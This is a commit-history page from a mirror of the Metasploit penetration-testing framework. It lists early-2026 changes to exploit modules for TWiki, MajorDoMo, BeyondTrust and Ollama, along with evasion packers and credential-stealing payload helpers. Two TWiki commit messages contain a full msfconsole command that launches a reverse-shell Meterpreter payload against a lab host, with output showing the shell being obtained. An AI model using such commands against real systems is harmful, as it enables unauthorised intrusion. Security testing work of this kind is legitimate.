adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
80,279 Commits 27 Branches 1,043 Tags
3f2a07bdcaddfac2ddf05c31400a749c2e88404c
Commit Graph

39762 Commits

Author SHA1 Message Date
Spencer McIntyre 3f2a07bdca Update #make_steal_credentials_payload to just take url 2026-03-03 09:37:27 -05:00
Spencer McIntyre 18bdbfa402 Update instances of #backend_url to use #get_uri 2026-03-03 09:37:26 -05:00
adfoster-r7 9df6879a95 Update modules to use srvhost method 2026-03-03 09:37:25 -05:00
Spencer McIntyre 514bb88962 Fix java payload cached sizes 2026-03-03 09:34:49 -05:00
Spencer McIntyre 758ac7f2f6 Apply rubocop changes 2026-03-03 09:34:49 -05:00
Spencer McIntyre fc49421939 Replace checks for nonroutable addresses 
This consolidates modules that check for a nonroutable SRVHOST value and
replaces it with OptAddressRoutable, defaulting to a reasonable address.
 2026-03-03 09:34:49 -05:00
Spencer McIntyre a0fb02bd45 Default the address in the SMB share mixin 2026-03-03 09:34:49 -05:00
Spencer McIntyre 92e77de800 Update to use OptAddressRourtable for SRVHOST 2026-03-03 09:34:48 -05:00
Diego Ledda 38dbefecfc Merge pull request #20965 from litemars/add_Linux_evasion_module-rc4_packer_x86 
adding RC4 packer x86, rc4 decrypt routine and sleep evasion routine
 2026-03-03 04:36:51 -05:00
Brendan 9ea5a54fe9 Merge pull request #20940 from g0tmi1k/twiki_search 
twiki_search: Fix exploit, more verbose, error handling, add fetch payload support
 2026-03-02 17:55:50 -06:00
Brendan 9664ab5191 Merge pull request #20946 from g0tmi1k/twiki_history 
twiki_history: Add revision+page options & Fetch payload support
 2026-03-02 13:58:44 -06:00
sjanusz-r7 ccc8367db5 Working Kerberoast and AS-REP modules with LDAP sessions 2026-03-02 15:33:36 +00:00
adfoster-r7 7545328be1 Linting 2026-03-02 15:02:56 +00:00
adfoster-r7 1a4ae7bfa3 Fix broken module url references 2026-03-02 14:35:48 +00:00
Diego Ledda 6f84c83135 Merge pull request #21000 from Chocapikk/add-modules-majordomo-rce 
Add three MajorDoMo unauthenticated RCE modules
 2026-03-02 05:20:22 -05:00
Diego Ledda 069dea2296 Apply suggestion from @dledda-r7 2026-02-27 17:04:03 +01:00
Valentin Lobstein 615ca34e29 Fix: Remove explicit timeouts from send_request_cgi calls 2026-02-27 14:42:00 +01:00
Valentin Lobstein 6923badeac Fix: Use background thread for cycle.php bootstrap instead of timeout 2026-02-27 14:34:24 +01:00
Valentin Lobstein 76d103e483 Fix: Bootstrap cycle tables and update lab documentation 
Add cycle.php bootstrap request in cmd_injection module to create
missing MEMORY tables before starting the cycle_execs.php worker.
Update all three module docs with curl in Dockerfile, Docker gateway
instructions, Options sections, and verified scenario outputs.
 2026-02-27 14:33:04 +01:00
dledda-r7 a59738700f chore: moved rc4_packer to x86 sub-directory, rubocop fix 2026-02-27 07:28:14 -05:00
Diego Ledda 0d259baf5e Merge pull request #20964 from litemars/add_Linux_evasion_module-rc4_packer_arm64 
adding RC4 packer arm64, rc4 decrypt routine and sleep evasion routine
 2026-02-26 09:11:39 -05:00
g0t mi1k 218c8df3bd twiki_search: Drop MeterpreterTryToFork & fail_with 2026-02-26 09:35:50 +00:00
g0t mi1k fd1d10ec28 twiki_history: Drop MeterpreterTryToFork & fail_with 2026-02-26 09:27:53 +00:00
g0t mi1k 801bc77ec8 twiki_search: Add Linux fetch payload support 
Fetch over CmdStager

- - -

Without MeterpreterTryToFork:
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:49864) at 2026-02-19 17:22:57 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_search) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 4935 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 2026-02-26 07:12:47 +00:00
g0t mi1k 529b53ecc4 twiki_search: Add send_request() function 
This is based on MR feedback
 2026-02-26 07:12:47 +00:00
g0t mi1k 188832d68f twiki_search: Var consistencies 
Sorry, not sorry
 2026-02-26 07:12:47 +00:00
g0t mi1k 1d40b352a5 twiki_search: Consistency with exploit & check 
Payload & formatting was slightly different
 2026-02-26 07:12:47 +00:00
g0t mi1k 0395a27358 twiki_search: Improve error handing 2026-02-26 07:12:47 +00:00
g0t mi1k 71845d44a1 twiki_search: Be more verbose 2026-02-26 07:12:47 +00:00
g0t mi1k 627c1272da twiki_search: Add versions to description 
REF: https://web.archive.org/web/20221006175642/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
 2026-02-26 07:12:47 +00:00
g0t mi1k c7ffa09f01 twiki_search: Add SEARCH_PATH & switch default 
/search/Main/SearchResult - https://www.exploit-db.com/exploits/642   *Works for me*

/view/Main/WebSearch      - https://github.com/rapid7/metasploit-framework/commit/6414821ea860c6f33d9129d9af0e9648be5972a9   *Fails for me*
 2026-02-26 07:12:47 +00:00
g0t mi1k 6c804749f2 twiki_search: Switch from > to |tee 
Otherwise:
> sh: gt: command not found
 2026-02-26 07:12:47 +00:00
g0t mi1k 0b1687b5d5 twiki_history: Add Linux fetch payload support 
Fetch over CmdStager

- - -

Without MeterpreterTryToFork:
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/webapp/twiki_history; set payload cmd/linux/http/x86/meterpreter/reverse_tcp; run'
[...]
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:40453) at 2026-02-19 19:30:07 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_history) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5042 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 2026-02-26 07:12:43 +00:00
g0t mi1k a22698205e twiki_history: Add send_request() function 
This is based on MR feedback
 2026-02-26 07:12:43 +00:00
g0t mi1k b393381296 twiki_history: Var consistencies 
Sorry, not sorry
 2026-02-26 07:12:42 +00:00
g0t mi1k 3adcfb8825 twiki_history: Improve error handing 2026-02-26 07:12:42 +00:00
g0t mi1k 4530fb3d13 twiki_history: Be more verbose 2026-02-26 07:12:42 +00:00
g0t mi1k 97668a0f0f twiki_history: Add TWIKI_PAGE 
It can be any twiki page
 2026-02-26 07:12:42 +00:00
g0t mi1k cffe0804ab twiki_history: Consistency with exploit & check 2026-02-26 07:12:42 +00:00
g0t mi1k 6177ba25fa twiki_history: Add versions to description 
REF: https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
 2026-02-26 07:12:42 +00:00
g0t mi1k bad9f29265 twiki_history: Add TWIKI_REVISION 
Cannot leave it to chance, otherwise you may get HTTP 404
 2026-02-26 07:12:42 +00:00
msutovsky-r7 ccce3a7dca Land #20951, moves default payload into more consistent default options 
Moves default payload into default options in Remote for Mac module
 2026-02-25 17:06:30 +01:00
dledda-r7 f6c980b5fd chore: moved aarch64 rc4 packer to arch specific folder 2026-02-25 09:56:38 -05:00
msutovsky-r7 fae76b2961 Land #20978, adds module BeyondTrust unauth command injection (CVE-2026-1731) 
Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/R…
 2026-02-25 14:18:59 +01:00
Martin Sutovsky 0c12becfcf Separates modules 2026-02-25 13:56:13 +01:00
Martin Sutovsky 63c7bd4958 Temp rollback 2026-02-25 13:54:20 +01:00
msutovsky-r7 7dcc036b6d Land #21006, adds module for Ollama path traversal RCE (CVE-2024-37032) 
Add Ollama path traversal RCE module (CVE-2024-37032)
 2026-02-25 13:06:09 +01:00
msutovsky-r7 c5303e2ac1 Apply suggestion from @msutovsky-r7 2026-02-25 12:54:17 +01:00
msutovsky-r7 002daf8d7d Merge branch 'beyondtrust-rce-2026' into collab/exploit/beyondtrust/cve-2026-1731 2026-02-25 12:53:37 +01:00
Jonah Burgess e77b1c00c6 Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/RS RCE 2026-02-25 10:12:23 +01:00